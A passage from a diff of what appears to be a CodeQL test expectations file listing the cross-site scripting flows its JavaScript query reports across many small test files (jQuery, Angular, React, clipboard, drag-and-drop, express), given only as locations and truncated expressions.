    ' | -| various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | semmle.label | (attrs. ... 'left') | -| various-concat-obfuscations.js:15:28:15:32 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:17:24:17:28 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:18:10:18:59 | '
    ') | semmle.label | '
    ') | -| various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | semmle.label | '
    ') [ArrayElement] | -| various-concat-obfuscations.js:18:32:18:36 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | semmle.label | attrs.d ... 'left' | -| various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | -| various-concat-obfuscations.js:20:17:20:40 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | -| various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | -| various-concat-obfuscations.js:21:17:21:40 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | -| winjs.js:2:7:2:53 | tainted | semmle.label | tainted | -| winjs.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | -| winjs.js:2:17:2:53 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| winjs.js:3:43:3:49 | tainted | semmle.label | tainted | -| winjs.js:4:43:4:49 | tainted | semmle.label | tainted | +#select +| addEventListener.js:2:20:2:29 | event.data | addEventListener.js:1:43:1:47 | event | addEventListener.js:2:20:2:29 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:1:43:1:47 | event | user-provided value | +| addEventListener.js:6:20:6:23 | data | addEventListener.js:5:43:5:48 | {data} | addEventListener.js:6:20:6:23 | data | Cross-site scripting vulnerability due to $@. | addEventListener.js:5:43:5:48 | {data} | user-provided value | +| addEventListener.js:12:24:12:33 | event.data | addEventListener.js:10:21:10:25 | event | addEventListener.js:12:24:12:33 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:10:21:10:25 | event | user-provided value | +| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... 
().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | Cross-site scripting vulnerability due to $@. | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | user-provided value | +| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | angular2-client.ts:26:44:26:69 | this.ro ... .params | angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:26:44:26:69 | this.ro ... .params | user-provided value | +| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | angular2-client.ts:27:44:27:74 | this.ro ... yParams | angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:27:44:27:74 | this.ro ... yParams | user-provided value | +| angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | Cross-site scripting vulnerability due to $@. | angular2-client.ts:28:44:28:71 | this.ro ... ragment | user-provided value | +| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | user-provided value | +| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | user-provided value | +| angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | Cross-site scripting vulnerability due to $@. 
| angular2-client.ts:32:46:32:59 | map.get('foo') | user-provided value | +| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | Cross-site scripting vulnerability due to $@. | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | user-provided value | +| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | angular2-client.ts:36:44:36:80 | this.ro ... ameters | angular2-client.ts:36:44:36:82 | this.ro ... eters.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:36:44:36:80 | this.ro ... ameters | user-provided value | +| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | user-provided value | +| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | angular2-client.ts:38:44:38:89 | this.ro ... .params | angular2-client.ts:38:44:38:91 | this.ro ... arams.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:38:44:38:89 | this.ro ... .params | user-provided value | +| angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:40:44:40:58 | this.router.url | user-provided value | +| angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:42:45:42:59 | this.router.url | user-provided value | +| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | angular2-client.ts:43:75:43:105 | this.ro ... yParams | angular2-client.ts:43:75:43:109 | this.ro ... 
ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:43:75:43:105 | this.ro ... yParams | user-provided value | +| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | user-provided value | +| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | angular-tempate-url.js:13:30:13:31 | ev | angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | Cross-site scripting vulnerability due to $@. | angular-tempate-url.js:13:30:13:31 | ev | user-provided value | +| classnames.js:7:31:7:84 | `` | classnames.js:7:58:7:68 | window.name | classnames.js:7:31:7:84 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:7:58:7:68 | window.name | user-provided value | +| classnames.js:8:31:8:85 | `` | classnames.js:8:59:8:69 | window.name | classnames.js:8:31:8:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:8:59:8:69 | window.name | user-provided value | +| classnames.js:9:31:9:85 | `` | classnames.js:9:59:9:69 | window.name | classnames.js:9:31:9:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:9:59:9:69 | window.name | user-provided value | +| classnames.js:11:31:11:79 | `` | classnames.js:10:45:10:55 | window.name | classnames.js:11:31:11:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:10:45:10:55 | window.name | user-provided value | +| classnames.js:13:31:13:83 | `` | classnames.js:13:57:13:67 | window.name | classnames.js:13:31:13:83 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:13:57:13:67 | window.name | user-provided value | +| classnames.js:15:31:15:78 | `` | classnames.js:15:52:15:62 | window.name | classnames.js:15:31:15:78 | `` | Cross-site scripting vulnerability due to $@. 
| classnames.js:15:52:15:62 | window.name | user-provided value | +| classnames.js:17:32:17:79 | `` | classnames.js:17:53:17:63 | window.name | classnames.js:17:32:17:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:17:53:17:63 | window.name | user-provided value | +| clipboard.ts:15:25:15:28 | html | clipboard.ts:8:18:8:51 | clipboa ... /html') | clipboard.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:8:18:8:51 | clipboa ... /html') | user-provided value | +| clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:24:23:24:58 | e.clipb ... /html') | user-provided value | +| clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:29:19:29:54 | e.clipb ... /html') | user-provided value | +| clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:33:19:33:68 | e.origi ... /html') | user-provided value | +| clipboard.ts:50:29:50:32 | html | clipboard.ts:43:22:43:55 | clipboa ... /html') | clipboard.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:43:22:43:55 | clipboa ... /html') | user-provided value | +| clipboard.ts:73:29:73:39 | droppedHtml | clipboard.ts:71:27:71:62 | e.clipb ... /html') | clipboard.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | clipboard.ts:71:27:71:62 | e.clipb ... /html') | user-provided value | +| clipboard.ts:99:23:99:26 | html | clipboard.ts:98:22:98:54 | dataTra ... /html') | clipboard.ts:99:23:99:26 | html | Cross-site scripting vulnerability due to $@. 
| clipboard.ts:98:22:98:54 | dataTra ... /html') | user-provided value | +| custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | Cross-site scripting vulnerability due to $@. | custom-element.js:5:26:5:36 | window.name | user-provided value | +| d3.js:11:15:11:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:11:15:11:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:12:20:12:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:12:20:12:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:14:20:14:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:14:20:14:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:21:15:21:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:21:15:21:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| dates.js:11:31:11:70 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:11:31:11:70 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:12:31:12:73 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:12:31:12:73 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:13:31:13:72 | `Time i ... time)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:13:31:13:72 | `Time i ... time)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:16:31:16:69 | `Time i ... 
aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:16:31:16:69 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:18:31:18:66 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:18:31:18:66 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:21:31:21:68 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:21:31:21:68 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:37:31:37:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:37:31:37:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:38:31:38:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:38:31:38:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:39:31:39:86 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:39:31:39:86 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:40:31:40:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:40:31:40:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:48:31:48:90 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:48:31:48:90 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. 
| dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:49:31:49:89 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:49:31:49:89 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:50:31:50:104 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:50:31:50:104 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:57:31:57:101 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:57:31:57:101 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dates.js:59:31:59:87 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:59:31:59:87 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dates.js:61:31:61:88 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:61:31:61:88 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dragAndDrop.ts:15:25:15:28 | html | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | dragAndDrop.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | user-provided value | +| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | user-provided value | +| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... 
/html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | user-provided value | +| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | user-provided value | +| dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | +| dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | +| event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | +| jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | +| jquery.js:14:19:14:58 | decodeU ... n.hash) | jquery.js:14:38:14:57 | window.location.hash | jquery.js:14:19:14:58 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | jquery.js:14:38:14:57 | window.location.hash | user-provided value | +| jquery.js:15:19:15:60 | decodeU ... search) | jquery.js:15:38:15:59 | window. ... .search | jquery.js:15:19:15:60 | decodeU ... search) | Cross-site scripting vulnerability due to $@. | jquery.js:15:38:15:59 | window. ... .search | user-provided value | +| jquery.js:16:19:16:64 | decodeU ... ring()) | jquery.js:16:38:16:52 | window.location | jquery.js:16:19:16:64 | decodeU ... ring()) | Cross-site scripting vulnerability due to $@. | jquery.js:16:38:16:52 | window.location | user-provided value | +| jquery.js:21:5:21:21 | hash.substring(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:21:5:21:21 | hash.substring(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:22:5:22:25 | hash.su ... (1, 10) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:22:5:22:25 | hash.su ... (1, 10) | Cross-site scripting vulnerability due to $@. 
| jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:23:5:23:18 | hash.substr(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:23:5:23:18 | hash.substr(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:24:5:24:17 | hash.slice(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:24:5:24:17 | hash.slice(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:27:5:27:25 | hash.re ... #', '') | jquery.js:18:14:18:33 | window.location.hash | jquery.js:27:5:27:25 | hash.re ... #', '') | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:28:5:28:43 | window. ... ?', '') | jquery.js:28:5:28:26 | window. ... .search | jquery.js:28:5:28:43 | window. ... ?', '') | Cross-site scripting vulnerability due to $@. | jquery.js:28:5:28:26 | window. ... .search | user-provided value | +| jquery.js:34:5:34:25 | '' + ... '' | jquery.js:18:14:18:33 | window.location.hash | jquery.js:34:5:34:25 | '' + ... '' | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:36:25:36:31 | tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:36:25:36:31 | tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. 
| json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | +| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | +| optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:17:20:17:20 | x | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:17:20:17:20 | x | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:32:18:32:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:32:18:32:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... 
.search | user-provided value | +| optionalSanitizer.js:36:18:36:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:36:18:36:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:39:18:39:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:39:18:39:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:43:18:43:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:43:18:43:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:45:18:45:56 | sanitiz ... target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| pages/[id].jsx:10:44:10:45 | id | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:10:44:10:45 | id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:5:18:5:29 | router.query | user-provided value | +| pages/[id].jsx:13:44:13:52 | params.id | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:13:44:13:52 | params.id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:25:11:25:24 | context.params | user-provided value | +| pages/[id].jsx:16:44:16:51 | params.q | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:16:44:16:51 | params.q | Cross-site scripting vulnerability due to $@. 
| pages/[id].jsx:26:10:26:22 | context.query | user-provided value | +| react-native.js:8:18:8:24 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:18:8:24 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-native.js:9:27:9:33 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:9:27:9:33 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:10:22:10:32 | window.name | user-provided value | +| react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:16:26:16:36 | window.name | user-provided value | +| react-use-router.js:8:21:8:39 | router.query.foobar | react-use-router.js:8:21:8:32 | router.query | react-use-router.js:8:21:8:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:8:21:8:32 | router.query | user-provided value | +| react-use-router.js:11:24:11:42 | router.query.foobar | react-use-router.js:11:24:11:35 | router.query | react-use-router.js:11:24:11:42 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:11:24:11:35 | router.query | user-provided value | +| react-use-router.js:23:43:23:61 | router.query.foobar | react-use-router.js:23:43:23:54 | router.query | react-use-router.js:23:43:23:61 | router.query.foobar | Cross-site scripting vulnerability due to $@. 
| react-use-router.js:23:43:23:54 | router.query | user-provided value | +| react-use-router.js:33:21:33:39 | router.query.foobar | react-use-router.js:33:21:33:32 | router.query | react-use-router.js:33:21:33:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:33:21:33:32 | router.query | user-provided value | +| react-use-state.js:5:51:5:55 | state | react-use-state.js:4:38:4:48 | window.name | react-use-state.js:5:51:5:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:4:38:4:48 | window.name | user-provided value | +| react-use-state.js:11:51:11:55 | state | react-use-state.js:10:14:10:24 | window.name | react-use-state.js:11:51:11:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:10:14:10:24 | window.name | user-provided value | +| react-use-state.js:17:51:17:55 | state | react-use-state.js:16:20:16:30 | window.name | react-use-state.js:17:51:17:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:16:20:16:30 | window.name | user-provided value | +| react-use-state.js:23:35:23:38 | prev | react-use-state.js:25:20:25:30 | window.name | react-use-state.js:23:35:23:38 | prev | Cross-site scripting vulnerability due to $@. | react-use-state.js:25:20:25:30 | window.name | user-provided value | +| sanitiser.js:23:21:23:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:23:21:23:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:30:21:30:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:30:21:30:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:33:21:33:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:33:21:33:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. 
| sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:38:21:38:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:38:21:38:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:45:21:45:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:45:21:45:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:48:19:48:46 | tainted ... /g, '') | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:48:19:48:46 | tainted ... /g, '') | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| stored-xss.js:5:20:5:52 | session ... ssion') | stored-xss.js:2:39:2:62 | documen ... .search | stored-xss.js:5:20:5:52 | session ... ssion') | Cross-site scripting vulnerability due to $@. | stored-xss.js:2:39:2:62 | documen ... .search | user-provided value | +| stored-xss.js:8:20:8:48 | localSt ... local') | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:8:20:8:48 | localSt ... local') | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | +| stored-xss.js:12:20:12:54 | "" | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:12:20:12:54 | "" | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | +| string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | Cross-site scripting vulnerability due to $@. | string-manipulations.js:3:16:3:32 | document.location | user-provided value | +| string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... 
